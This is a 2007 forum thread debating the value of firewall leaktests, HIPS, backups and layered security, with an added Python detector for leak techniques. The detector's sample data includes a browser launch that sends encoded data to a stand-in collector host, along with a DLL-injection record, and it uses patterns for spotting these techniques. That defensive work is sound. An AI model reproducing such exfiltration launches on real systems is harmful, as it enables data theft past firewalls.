Firewall leaktests

Discussion in 'other firewalls' started by Peter2150, Mar 20, 2007.

Thread Status:
Not open for further replies.
  1. TheQuest

    TheQuest Registered Member

    Joined:
    Jun 9, 2003
    Posts:
    2,304
    Location:
    Kent. UK by the sea
    Hi, All

    If users [M$] did not run as Admins so often [default install], they would do very little harm to their systems with the test.

    Take Care,
    TheQuest :cool:
     
  2. Seer

    Seer Registered Member

    Joined:
    Feb 12, 2007
    Posts:
    2,068
    Location:
    Serbia
    Hello ErikAlbert.

    I am not saying that there is anything wrong with your concept of using backups and archives for protection. This is the most important, last line of defense. I just wanted to point out the still important usage of prevention applications alongside. The priority of security should be to prevent malware from getting into your PC in the first place, so that you don't have to use backups (too often). You use backups only when all else fails.

    :)

    EDIT: well, I am using FDISR also.
     
    Last edited: Mar 28, 2007
  3. ErikAlbert

    ErikAlbert Registered Member

    Joined:
    Jun 16, 2005
    Posts:
    9,455
    I'm very aware of this. I never considered FDISR as security software and mentioned this more than once at Wilders with an explanation why it wasn't. FDISR doesn't even know what malware is, but FDISR does something else: it undoes CHANGES, and that means a total removal of bad (and good) changes. Scanners don't give me that guarantee; they only remove what is on their blacklist (+ heuristics), and that gives me only a grey computer.
    I want a WHITE computer the next morning.
     
    Last edited: Mar 28, 2007
  4. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hello Herbalist,

    You are talking from a "real life / every day" use; in this context it indeed does not matter which application catches the leaktest or malware, as long as the malware is caught. You are already in the consequences: you use a HIPS to catch suspicious or dangerous behaviours, which is what I advised. The point of the leaktests is precisely to lead you to this conclusion.

    The leaktests were never meant to test your whole security setup, only the outbound protection from personal firewalls.

    Again, this is the conclusion of the leaktests: a firewall alone cannot win against everything, you must use more layers. As I said above, the leaktests are to be run with a context in mind, the context where (no matter the reason) all your other security layers were bypassed. Of course in your case, with HIPS + AV + Firewall + others, if the AV and the HIPS are bypassed, there are great chances that the firewall will be too (e.g. rootkit). However, people only running with a firewall alone are more in the scope of the test, and should benefit more from the conclusion that a firewall alone is not enough, and will (I hope) add more layers to their system.

    You are not in this case, since you perfectly understand that a layered approach is safer :)

    Of course, securing the Operating System itself is part of the layers, I have written a document about this point :
    http://www.firewallleaktester.com/docs/Securing Windows.pdf

    @ErikAlbert
    Using backups is not a full security measure, for many reasons:
    - if someday you are hacked, and then you restore a backup, you won't know how you were hacked, because of which software/vulnerability, and you are likely to be hacked again (the hole is not closed).
    - if during the hack a keylogger is installed, it may have the time to log passwords and to send them out before you restore a backup.
    - what if you got an MBR virus? In this case, only a restore of your whole HDD (MBR + partitions) will erase it.

    Imaging is mainly used in case of hardware failure. It is also used in security, for instance in cyber-cafe to restore the system at every boot, but in my opinion, it should be part of a layered security, and not being the sole security measure in place.

    Anything persistent after the reboot will. However, something such as a vulnerability exploit in your browser will not necessarily. A successful exploit executing arbitrary code could execute shellcode from within your browser memory, read data on your HDD, and send it out. It all depends on what the shellcode does. It can of course download a malware and copy it to the HDD as well.

    I'm using backups myself, but not as a sole security defense.

    Regards,
    gkweb.

    EDIT: you type faster than me:
    You seem to already use it in a layered approach, which is good ;)
     
  5. ErikAlbert

    ErikAlbert Registered Member

    Joined:
    Jun 16, 2005
    Posts:
    9,455
    gkweb,
    I will consider your remarks anyway and I will use security software in my on-line snapshot to save the day.
    I just have to find the right ones. Thanks for the useful remarks.
     
  6. Seer

    Seer Registered Member

    Joined:
    Feb 12, 2007
    Posts:
    2,068
    Location:
    Serbia
    Hello.

    Again, a major point here - the learning curve. It's necessary to learn if you want to be protected.
     
  7. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    For the purposes of testing and experimentation, disabling other software to see how the firewall alone handles a situation can be useful (e.g. to check that it is properly configured, to see the type of alert and the information it gives) and this was what the original poster seemed to be interested in. For more general testing though, your points are perfectly valid.
     
  8. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,223
    Hello,

    The tests are meaningless because you know what you're doing.

    HIPS are not very useful, because if you can answer every single prompt correctly - you don't need HIPS. If you can't, you'll shoot yourself one day in the foot and never know it.

    Mrk
     
  9. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hello Mrk,

    I cannot agree with you, as it is a broad statement.
    You assume that if we are skilled enough to understand perfectly all HIPS prompts and reply properly to every prompt, we are skilled enough to practice safe hex and to not do anything harmful to our computer.

    However, what happens on our computer is not only the result of what we intend to do: if I browse a "trusted" forum which has been compromised, it can download a trojan on my computer using an exploit in the forum, and execute it. Without a HIPS, I won't be prompted whether I want to allow trojan.exe to run or not, despite the fact that I did nothing wrong.

    If you are skilled enough to perfectly understand a HIPS and all of its prompts, you are indeed less likely to be infected or hacked, but you still can be. While I agree that a HIPS is not useful at all to someone who clicks "YES" or "NO" randomly, it surely helps the others and is a strong security layer.

    Regards,
    gkweb.
     
  10. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,223
    Hello,
    Agreed. But ...
    What are the chances of a trusted X or Y being compromised?
    If you put IE / OE / other MS toys out of the game, what are the chances of any of those exploits actually working? Close to none, if not none.
    Take any decent non-IE browser, go to the worst possible site you can think of, and it will be as silent as a bunch of lambs.
    So HIPS may make sense if you use MS toys. But if you exclude one simple vector from the equation, the game becomes boring. Furthermore, if you understand HIPS and their prompts, you will have configured your system just like a HIPS would - policies and such - so that you do not need a third-party tool for that.
    Mrk
     
  11. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hello Mrk,

    Thus you agree that technically without a HIPS you have less control and can be infected; that's what I said. I'm glad you confirm this point.

    Then, we judge the issue differently. You think that this issue is less likely to happen and therefore is not worth adding a HIPS. Whereas I think that on one hand, the chances of it happening are greater than none (it happened in the past, I'll try to find you the link), and on the other hand, even if it was much less likely to happen, it is still possible, and therefore it justifies protecting ourselves.

    If an exploit is found against JavaScript it will work no matter your browser (if you have it enabled, of course). Also 0-day exploits exist and are not a myth.
    I perfectly agree with you that removing any "MS toys" such as IE/OE/MSN decreases dramatically the chances of being hit by an exploit. However, "chances" are what they are, unpredictable probabilities, and I do not base my security on uncertainty.

    Our disagreement comes from our personal choice, from our conclusion after having analysed what we have to protect, its value, and what the chances are for someone to steal it. I would say we agree on the facts, but not on the conclusion. I think everyone here has all the facts at hand and can choose either your way or mine; forums exist for this, there is not one unique absolute truth :)

    Regards,
    gkweb.
     
  12. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    10,223
    Hello,

    Of course I agree that extra monitoring means .... extra monitoring. I just find the person in control of the monitoring will make more mistakes than actual exploits will ever happen.

    When you say JS vulnerability, you mean in the rendering software - like the browser - not the code itself, of course. Sure, possible, but not likely given the robustness of non-IE products and the speed of patching. You're more likely to have your HDD die than get hit by an exploit through JS in FF - just an example.

    Most 0-day exploits are MSc thesis food.

    Finally, you can make the game boring altogether by going for Linux.

    Exploits exist, vulnerabilities exist, HIPS offer more information than none, but all combined, the benefit to anyone but real geeks is close to zero, because before the exploits happen, the user will make 30 other little mistakes along the way, including simple things like cleaning the dust with vacuum cleaner or spilling juice on the keyboard.

    BTW, to put things in perspective, very few people have ever heard the word exploit let alone leaktest.

    Mrk
     
  13. herbalist

    herbalist Guest

    I can't totally agree with that. If the term "firewall" is referring to both internet and application firewalls, whether they're combined or separate apps, then I can go along with it. Some of the leaktests specifically target the security software's ability to intercept hooks and prevent the exploiting of apps that have internet access, aka the application firewall or HIPS component. Others target Internet Explorer exclusively, and a simple blocking rule changes the test results completely. When the user is running a security or firewall suite, the whole package is effectively being tested, unless the user is going to disable all the features like the HIPS component and test just the internet firewall component. A test like PCAudit 6.3 comes to mind. Any decent HIPS, whether part of the firewall or separate, can block the hook and defeat this test. Some users just don't realize that when the hook is blocked, the internet firewall's ability to control traffic doesn't get tested, and they'd do much better to allow the hook and use the test to tighten their firewall's loopback rules.

    Unfortunately, leaktests are improperly used or outright abused far more often than they're used properly. What burns me is seeing them used as advertising tools. Things like "Our Firewall suite with HIPS is superior to other firewalls because it passes more leaktests". I'd like to see a sticky thread at the top of the firewall section about how to properly use leaktests to tighten up a firewall instead of seeing them used to make scorecards for firewalls. Test results don't mean much when the user doesn't understand what the specific tests are doing, or why firewall "A" passes a given test but firewall "B" does not. Instead of setting up an effective layered security package, the result is a big pile of half configured security apps. Instead of leak testers, they should have been called configuration testers. They might have been misused a bit less.
    Rick
     
  14. DVD+R

    DVD+R Registered Member

    Joined:
    Aug 2, 2006
    Posts:
    1,979
    Location:
    The Antipodes
    I personally don't give a Rats Ass about Leaktests anymore :cautious: It neither bothers me, nor will it; the sites I use that Need Secure login, i.e. such as Internet Banking Etc, are All Secured by VeriSign, and that's more than good enough for me, or Anyone really. If you sat and thought about All the Hoo Haa!, and other Bullshit about Data being leaked, then the Simple fact of the Matter is Nobody would use the Internet any More :shifty: I've said this before, and I'll say it again, Hackers will pay no nevermind to the likes of you and me, Unless you're in the Habit of Transferring Millions of Dollars a day, they really won't give us a Second Glance :ninja: because really, what are they likely to gain o_O Maybe a few MP3 files here and there, and It's a Sad Hacker who'll stoop to that Level of Boredom :cautious:
     
  15. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    Whoopee...the "Secured by Verisign" logo means that the site paid Verisign for an SSL certificate (which only serves as a check on their identity, not security) and extra advertising. It certainly offers nothing to protect against malware on your PC.
    Any PC with a decent Internet connection is a target. Regardless of what data is stored on it, a hijacked PC can be used for the following:
    • sending spam (most now comes from trojaned Windows PCs);
    • DDoSing websites (which then have to pay blackmail money to avoid further attack);
    • hosting websites (specifically the openly criminal or fraudulent ones like Impex Consult);
    • installing adware, allowing the trojan controller to claim a commission;
    • as a proxy, either providing a layer of anonymity for illegal purposes or issuing control instructions to other malware.
    Firewalls with good leaktest performance have a better chance of being able to flag network connections made by these programs, allowing alert users to block them and take steps to clean their system. People who think they are beneath the notice of major criminal gangs because they have "nothing of value" are greatly mistaken - their system and connection is of value and will be exploited if unsecured.
     
  16. BuzzStone

    BuzzStone Registered Member

    Joined:
    Nov 8, 2006
    Posts:
    163
    Lol, I agree with you 100%, DVD+R. The leak tests are a joke. Well said.
     
  17. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    I agree with your reasons for needing something, but also I really don't care much about the leaktests either. I think they are a marketing gimmick. The flaw in your last statement is "alert users". Most Wilders members have layers of security that will catch stuff without the firewall doing it, and the mom and pop users will flunk the "alert users" category anyway.
     
  18. DVD+R

    DVD+R Registered Member

    Joined:
    Aug 2, 2006
    Posts:
    1,979
    Location:
    The Antipodes
    Now that's just Bloody Ridiculous. What you're saying is Little Billy, who up until now has done nothing more than play WarCraft on his pc, is open to exploitation :eek: from what, May I ask, exactly?? Is someone going to Log into his computer and steal his WarCraft ID o_O Or maybe they will discover some shadiness like he has pictures of Britney Spears on His Desktop :p :D Besides all that, to be an Alert User means you'll have to have Alarms & Stuff on your pc, or sit in front of it All Day Long, to which you need a life if you Do
     
  19. Pedro

    Pedro Registered Member

    Joined:
    Nov 2, 2006
    Posts:
    3,502
    1. You assume they know Little Billy
    2. You assume it's only about credit cards, and don't read what Paranoid wrote
    3. You assume someone has to be typing something to hack you
    4. You assume a lot, and provide no reasoning.

    Peter: If you layer, all the more reason to not need those features from a firewall, sure. Which was the first reason to make the leaktests; gkweb said as much. But that does not make them a bad feature in a firewall; they make it better imo, all else being equal.
    We're talking about dll injection, COM/OLE, parent process, etc. Not about an AV inside a FW searching for code, but detecting new things in an outbound connection in general.
    If you have it covered, it's perfectly fine, no one is saying otherwise, note.
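The techniques Pedro lists (dll injection, COM/OLE, parent process), together with the hook-based PCAudit behaviour herbalist describes earlier, are exactly what the HIPS or application-firewall component has to recognise before an already-trusted program is allowed to reach the network. The Python below is an added illustration written for this page, not code from the thread or from any firewall discussed in it: it turns each of the three categories into a check over process-creation and module-load records. The event layout, the lists of trusted programs and interactive parents, the user-writable path patterns, the treatment of the COM `-Embedding` switch as a signal, and the sample records are all assumptions made for the example.

```python
"""
Toy 'leak' detector over constructed process and module-load events.

Added example: it turns the three leaktest categories named in the thread
(parent-process launch, COM/OLE automation, DLL injection) into the kind of
check a HIPS or application firewall makes before letting a trusted program
talk to the network. The event shape, the program lists and the sample
records below are all assumptions for illustration, not captures from any
real product or test.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Tuple

# Programs the (hypothetical) firewall already trusts for outbound traffic.
NETWORK_TRUSTED = {"firefox.exe", "iexplore.exe", "opera.exe", "outlook.exe"}
# Parents a user-initiated browser start normally has (assumption).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "userinit.exe"}
# Locations any user can write to (XP-era profile layout assumed).
USER_WRITABLE = re.compile(
    r"(\\temp\\|\\application data\\|\\local settings\\|"
    r"\\documents and settings\\[^\\]+\\desktop\\)", re.I)
# A URL whose query string is long enough to smuggle data out.
URL_WITH_DATA = re.compile(r'https?://[^\s"]+\?[^\s"]{8,}', re.I)

Finding = Tuple[str, str, str]   # (category, image, detail)

@dataclass
class Event:
    kind: str                  # "process_create" or "image_load"
    image: str                 # full path of the process image
    parent_image: str = ""     # full path of the parent (process_create only)
    command_line: str = ""     # command line (process_create only)
    module: str = ""           # loaded module path (image_load only)

def _name(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any host."""
    return ntpath.basename(path).lower()

def check_event(evt: Event) -> List[Finding]:
    """Return the leak patterns an event matches (empty list if none)."""
    findings: List[Finding] = []
    img = _name(evt.image)
    if img not in NETWORK_TRUSTED:
        return findings            # only trusted networked programs matter here
    if evt.kind == "process_create":
        parent = _name(evt.parent_image)
        # 1. Parent-process launch: an unknown program starts the trusted
        #    browser and hands it a URL; the data rides out in the query string
        #    under the browser's own network permission.
        if parent not in INTERACTIVE_PARENTS and URL_WITH_DATA.search(evt.command_line):
            findings.append(("parent_process_launch", img, parent))
        # 2. COM/OLE automation: an out-of-process COM server is started with
        #    the -Embedding switch. The automating client is typically not the
        #    parent (the COM launch service starts the server), so the parent
        #    field does not name the culprit; the switch itself is the signal.
        if "-embedding" in evt.command_line.lower():
            findings.append(("com_ole_automation", img, evt.command_line))
    elif evt.kind == "image_load":
        # 3. DLL injection: a module loaded into the trusted process from a
        #    user-writable directory. Code in that module inherits the
        #    process's network access, which is the PCAudit-style hook case.
        if USER_WRITABLE.search(evt.module):
            findings.append(("dll_injection", img, _name(evt.module)))
    return findings

def scan(events: List[Event]) -> List[Finding]:
    """Run every event through check_event and collect the findings."""
    return [f for evt in events for f in check_event(evt)]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    Event("process_create", r"C:\Program Files\Mozilla Firefox\firefox.exe",
          r"C:\WINDOWS\explorer.exe",
          r'"C:\Program Files\Mozilla Firefox\firefox.exe" http://www.wilderssecurity.com/'),
    Event("process_create", r"C:\Program Files\Internet Explorer\iexplore.exe",
          r"C:\Documents and Settings\billy\Desktop\trainer.exe",
          r'"C:\Program Files\Internet Explorer\iexplore.exe" '
          r"http://collector.example.net/c.php?d=U2VyaWFsPTEyMzQtNTY3OA"),
    Event("process_create", r"C:\Program Files\Internet Explorer\iexplore.exe",
          r"C:\WINDOWS\system32\svchost.exe",
          r'"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding'),
    Event("image_load", r"C:\Program Files\Mozilla Firefox\firefox.exe",
          module=r"C:\Documents and Settings\billy\Local Settings\Temp\hook.dll"),
    Event("image_load", r"C:\Program Files\Mozilla Firefox\firefox.exe",
          module=r"C:\WINDOWS\system32\wininet.dll"),
]

if __name__ == "__main__":
    for category, image, detail in scan(SAMPLE_EVENTS):
        print(f"{category:22} {image:14} {detail}")
```

Run stand-alone it reports three of the five constructed events: the browser started by `trainer.exe` with a data-bearing URL, the browser started with `-Embedding`, and the DLL loaded into Firefox from the user's Temp directory; the explorer-launched browser and the system DLL load pass silently. The point the thread makes carries over directly: none of these checks look at the packets themselves, so a plain packet filter that only knows "firefox.exe may connect" sees nothing, while a component that watches how the trusted process came to exist (and what was loaded into it) has something to prompt on.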
     
  20. Seer

    Seer Registered Member

    Joined:
    Feb 12, 2007
    Posts:
    2,068
    Location:
    Serbia
    Hello.

    DVD+R, what about this statement:

    and this:

    o_O
     
  21. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    Peter and DVD, P2K knows what he is talking about.
     
    Last edited: Apr 6, 2007
  22. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Keep in mind that a leak test is an executable, simulating what a trojan will do if installed on your system.

    For most of us, we have to disable security in order to permit the leaktest.exe to run.

    1) Doing this is admitting that something might get by your security. In that case, the leaktest is relevant.

    2) If you are not concerned that something will breach your security, then the leaktest is not relevant.


    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier
     
  23. AJohn

    AJohn Registered Member

    Joined:
    Sep 29, 2004
    Posts:
    935
    I have tricked little Billy into running a new 'WarCraft Trainer' which was in actuality a new undetectable (by any AV out at the time) trojan which allowed me to have full access to every aspect of little Billy's PC. Not only did I steal his WarCraft credentials (including his serial number), I grabbed his dad's credit card info right before he used it to order some clothing (which was through a site using SSL and verified by VeriSign).

    Ohh, and I did all this to show little Billy how a firewall such as Outpost or Comodo would have prevented this. If I were more computer savvy and knew about a zero day exploit before it was patched, it would be very easy to do this to a great number of users without adequate protection on their PC... "Britney Spears new sex video, free download".
     
  24. herbalist

    herbalist Guest

    There's nothing ridiculous about it. You're missing the point. Little Billy is not the target here. The PC is. Your PC has value to them, even if your data (or lack of it) doesn't. A fast PC on a high speed cable connection makes an effective weapon, especially when the user hasn't kept it up to date. Large numbers of PCs like little Billy's are what's used to launch DDOS attacks, like the one against Castle Cops. This isn't just theory. It's commonplace. PCs are not toys, even if its owner uses it as one.

    No data of value to a hacker or botmaster on your PC? Think again!! How about your address book? Send some infected spam to everyone in the address book. One of little Billy's friends opens one: New Game secrets or nudie pics! Kids open these. Another bot is born, courtesy of the worthless data (a kid's e-mail addy) supplied by your PC. Two of my more recent clients felt as you do, until I dug the trojans out of their "just for games" PCs.
    Rick
     
  25. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Bots surge ahead in March
    Published: 2007-03-22

    The number of compromised computers that are part of a centrally controlled bot net has tripled in the past two weeks, according to data gathered by the Shadowserver Foundation, a bot-net takedown group.

    http://www.securityfocus.com/brief/466

    ___________________________________________________


    Published: 2007-03-23,
    Last Updated: 2007-03-23 21:28:02 UTC
    by John Bambenek

    According to data by Shadowserver, the number of botnet-controlled machines has tripled in the last month. Specifically the jump seemed to start on March 8th or so and has kept going ever since. For the most part, they haven't tracked a significant increase in the number of botnets (only about a 20% jump), just the number of machines. The biggest C&C nets are near New York, Southern California, and near Germany. The biggest concentrations of botnet infected machines are in China, Brazil, and Argentina.

    So it appears botnet controllers are getting better at increasing the size of their herds.


    http://isc.sans.org/diary.html?storyid=2495
     